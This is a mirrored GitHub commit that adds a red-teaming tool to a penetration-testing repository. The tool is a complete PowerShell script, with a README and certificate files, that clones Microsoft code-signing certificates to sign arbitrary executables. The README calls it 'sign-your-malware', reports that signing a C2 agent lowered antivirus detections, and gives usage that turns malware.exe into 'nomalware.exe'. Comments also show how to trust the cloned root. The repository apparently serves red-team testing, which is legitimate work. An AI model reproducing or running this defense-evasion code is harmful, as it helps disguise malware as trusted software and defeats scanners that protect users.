mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-22 09:05:06 +01:00
added self-signed threat
This commit is contained in:
parent
6b7ff300ae
commit
8d24963a0c
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
Binary file not shown.
19
red-teaming/Self-Signed Threat/README.md
Normal file
19
red-teaming/Self-Signed Threat/README.md
Normal file
@ -0,0 +1,19 @@
|
||||
## Easy-to-use test-it-yourself sign-your-malware
|
||||
|
||||
A Powershell script that signs input Executable file with fake Microsoft code-signing certificate to demonstrate risks of Code Signing attacks.
|
||||
|
||||
Script was borrowed from [Matt Graeber, @mattifestation](https://twitter.com/mattifestation) and his [_Code Signing Certificate Cloning Attacks and Defenses_](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec) and **all credits are his**.
|
||||
|
||||
As of 13/07/2022 this dumb trick still gets off the shelf malware evade detection of at least 8 modern security scanners.
|
||||
|
||||
| What | Result |
|
||||
|------------------------------------------------------------------------------|-----------|
|
||||
| Mythic Apollo.exe before fake-signing | [30/70](https://www.virustotal.com/gui/file/1413de7cee2c7c161f814fe93256968450b4e99ae65f0b5e7c2e76128526cc73?nocache=1) |
|
||||
| Mythic Apollo.exe after fake-signing with Microsoft code-signing certificate | [22/70](https://www.virustotal.com/gui/file/34543de8a6b24c98ea526d8f2ae5f1dbe99d64386d8a8f46ddbcdcebaac3df65?nocache=1) |
|
||||
|
||||
### Usage
|
||||
|
||||
```
|
||||
PS C:\> . .\Sign-Artifact.ps1
|
||||
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile nomalware.exe -Verbose
|
||||
```
|
98
red-teaming/Self-Signed Threat/Sign-Artifact.ps1
Normal file
98
red-teaming/Self-Signed Threat/Sign-Artifact.ps1
Normal file
@ -0,0 +1,98 @@
|
||||
Function Sign-Artifact {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
Signs input executable file with a faked Microsoft code signing certificate.
|
||||
|
||||
.DESCRIPTION
|
||||
This script uses built-into Windows interfaces to import a fake Microsoft code-signing certificate
|
||||
and use it to sign input executable artifact. Result will be signed, although not verifiable executable.
|
||||
|
||||
Based on Matt Graeber's implementation:
|
||||
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
|
||||
|
||||
.EXAMPLE
|
||||
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile microsoft.exe
|
||||
#>
|
||||
|
||||
[CmdletBinding()]
|
||||
param(
|
||||
[Parameter(Mandatory=$True)]
|
||||
[string]
|
||||
$InputFile,
|
||||
|
||||
[Parameter(Mandatory=$True)]
|
||||
[string]
|
||||
$OutputFile,
|
||||
|
||||
[switch]
|
||||
$Quiet
|
||||
)
|
||||
|
||||
$Verbose = $PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent
|
||||
|
||||
if (-not(Test-Path $InputFile))
|
||||
{
|
||||
Write-Error "[!] Input file does not exist! FilePath: $InputFile"
|
||||
exit 1
|
||||
}
|
||||
|
||||
if(Test-Path $OutputFile)
|
||||
{
|
||||
Remove-Item -Force $OutputFile
|
||||
}
|
||||
|
||||
#
|
||||
# Based on:
|
||||
#
|
||||
#
|
||||
|
||||
# We'll just store the cloned certificates in current user "Personal" store for now.
|
||||
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
|
||||
|
||||
$MS_Root_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "\MSKernel32Root.cer")
|
||||
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
|
||||
|
||||
$MS_PCA_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32PCA.cer")
|
||||
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
|
||||
|
||||
$MS_Leaf_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Leaf.cer")
|
||||
$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation
|
||||
|
||||
|
||||
# Validate that that $OutputFile is not signed.
|
||||
if($Verbose)
|
||||
{
|
||||
Write-Host "`n================================================================================================`n[.] Before signing: `n"
|
||||
Get-AuthenticodeSignature -FilePath $InputFile
|
||||
}
|
||||
|
||||
Copy-Item -Force $InputFile $OutputFile | Out-Null
|
||||
|
||||
|
||||
# Sign $OutputFile with the cloned Microsoft leaf certificate.
|
||||
Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $OutputFile | Out-Null
|
||||
|
||||
# The certificate will not properly validate because the root certificate is not trusted.
|
||||
|
||||
# View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
|
||||
# "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
|
||||
|
||||
if($Verbose)
|
||||
{
|
||||
Write-Host "`n================================================================================================`n[+] After signing: `n"
|
||||
Get-AuthenticodeSignature -FilePath $OutputFile
|
||||
}
|
||||
|
||||
if(-not $Quiet -or $Verbose)
|
||||
{
|
||||
Get-AuthenticodeSignature -FilePath $OutputFile | Format-List *
|
||||
}
|
||||
|
||||
# Save the root certificate to disk and import it into the current user root store.
|
||||
# Upon doing this, the $OutputFile signature will validate properly.
|
||||
# Export-Certificate -Type CERT -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -Cert $Cloned_MS_Root_Cert
|
||||
# Import-Certificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -CertStoreLocation Cert:\CurrentUser\Root\
|
||||
#
|
||||
# # You may need to start a new PowerShell process for the valid signature to take effect.
|
||||
# Get-AuthenticodeSignature -FilePath $FilePath
|
||||
}
|
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user